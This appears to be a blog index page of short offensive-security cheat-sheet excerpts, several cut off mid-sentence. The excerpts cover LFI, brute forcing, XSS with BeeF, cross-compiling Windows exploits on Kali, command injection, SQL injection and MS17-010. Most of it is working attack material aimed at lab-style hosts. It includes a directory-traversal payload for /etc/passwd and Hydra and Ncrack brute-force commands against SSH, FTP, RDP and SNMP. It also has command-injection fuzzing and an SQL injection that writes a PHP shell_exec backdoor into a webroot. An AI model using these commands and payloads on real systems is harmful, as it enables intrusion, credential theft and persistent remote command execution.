So this post is basically about why it is important to use Kerberos instead of NTLM and use SMB Signing as well. NTLM Relaying is a common man-in-the-middle attack with a high success-rate. SMB and NTLM Relaying is dangerous, as
Local File Inclusion (LFI)
Scripts that takes filenames as parameters without sanitizing the user input is typically good candidates for LFI vulnerabilities. For example, a PHP script : foo.php?file=image2.jpg An attacker would replace image2.jpg with a directory traversel payload: foo.php?file=../../../../../../../etc/passwd Or other sensitive files
Java Signed Applet Attack
Java Signed Applet Attack is a Client Side exploit and is based on a human vulnerability as opposted to software vulnerability. This attack affects targets with Java installed and enabled in their browsers. In this example we create a malicious
Brute forcing protocols/services
Ncrack ncrack can brute force RDP.
|
1 2 |
ncrack -vv --user user1 -P password-file.txt rdp://$ip |
Hydra Hydra brute force against SNMP
|
1 2 |
hydra -P password-file.txt -v $ip snmp |
Hydra FTP known user and rockyou password list
|
1 2 |
hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp |
Hydra SSH using list of users and passwords
|
1 2 |
hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh |
Hydra SSH using a known password and a
XSS – Cross Site Scripting
BeeF Framework BeeF is native in Kali and is a browser exploitation framework. From the vulnerable website insert below javascript to connect to BeeF hook on attack host. As XSS is a Client Side attack, most useful on persistent /
Compiling exploits to Windows on Kali
Compile Win32 exploit with Wine install mingw
|
1 2 3 4 |
wget http://downloads.sourceforge.net/project/mingw/Installer/mingw-get-setup.exe wine mingw-get-setup.exe # (select mingw base and c++, menu -> apply changes, quit) |
|
1 2 |
wine regedit # (HKCU/Environment add string PATH c:\windows;c:\windows\system;c:\MinGW\bin) rm mingw-get-setup.exe |
install some libs mingw needs
|
1 2 |
wget http://gojhonny.com/misc/mingw_bin.zipunzip mingw_bin.zip -d /root/.wine/drive_c/windows/ rm mingw_bin.zip |
running
|
1 2 3 4 |
wine mingw32-gcc.exe foo.c -o foo.exe -lws2_32 wine mingw32-g++.exe foo.cpp -o foo.exe -lws2_32 |
Command Injection – Tools and methods
Below is a list of common tools and methods to test for command injection. Commix
|
1 2 |
commix -r /home/workdir/email.req –auth-cred=admin:password –all –batch –level 3 |
wfuzz
|
1 2 |
wfuzz -c -z file,/usr/share/wordlists/fuzzdb/attack/os-cmd-execution/Commands-Linux.txt,base64 -b “PHPSESSID=077dn044qmuh2ut41tksedvlv2” -d “check=FUZZ” http://10.10.10.105/diag.php |
curl
|
1 2 3 |
# opt Param vuln to RCE: curl -v “http:/10.10.10.69/sync?opt=’ id’” |
SMB Following could be used to achieve command execution and pop a reverse shell via poorly configured SMB.
|
1 2 |
smbclient //10.10.10.3/tmp |
SQLMap
SQLMap is a tool that can be used to automate scanning and exploiting of SQL Injection. Below is some examples using SQLMap.
|
1 2 |
sqlmap -u “http://10.10.10.63/?id=” -a |
In below examle the scan is based on login.req which is the HTTP captured and exported from
SQL Injection – RCE and LFI Methods
Upload PHP Command Injection Following can be used to get RCE / Command Execution when target is vulnerable to SQLi.
|
1 2 |
union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php' |
Load File via SQLi Following can be used to read files from target.
|
1 2 |
union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6 |
MS17-010
Resources for MS17-010 Exploit: https://github.com/3ndG4me/AutoBlue-MS17-010 https://github.com/helviojunior/MS17-010 Scan for Vulnerable MS17-010:
|
1 2 |
nmap --script smb-vuln* -p 139,445 10.1.1.22 |
https://github.com/claudioviviani/ms17-010-m4ss-sc4nn3r